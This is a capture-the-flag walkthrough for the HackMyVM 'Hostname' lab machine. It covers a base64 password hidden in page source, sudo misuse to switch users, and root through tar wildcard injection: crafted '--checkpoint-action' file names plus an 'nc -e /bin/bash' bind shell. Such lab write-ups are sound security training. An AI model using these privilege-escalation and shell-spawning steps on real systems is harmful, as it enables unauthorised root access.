Hostname - Avijneyam
00. Metainfo
| Title: | Hostname |
| Author: | avijneyam |
| Release date: | 2022-05-04 |
| Download from: | HackMyVM |
| Level: | Easy |
| System: | Linux |
| You’ll learn: | Web-tools |
01. Entry
In the source code, you will find this:
<script crossorigin="S3VuZ19GdV9QNG5kYQ==" src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
Decode it:
echo -n 'S3VuZ19GdV9QNG5kYQ==' | base64 -d #Secret Word
Use the HackBar v2 plugin for Firefox and You got a password for SSH.
02. SSH
Log in to the console as user po.
export IP=172.16.1.240
ssh po@$IP
02a. User oogway
cat /etc/sudoers.d/po
# po HackMyVM = (oogway) NOPASSWD: /bin/bash
sudo -u oogway -h HackMyVM bash
cat /etc/crontab
02b. user root
cd /opt/secret/
touch -- --checkpoint=1
touch -- "--checkpoint-action=exec=sh exploit"
echo "nc -e /bin/bash -lvp 1234" > exploit
Wait a minute.
nc localhost 1234
Zostaw komentarz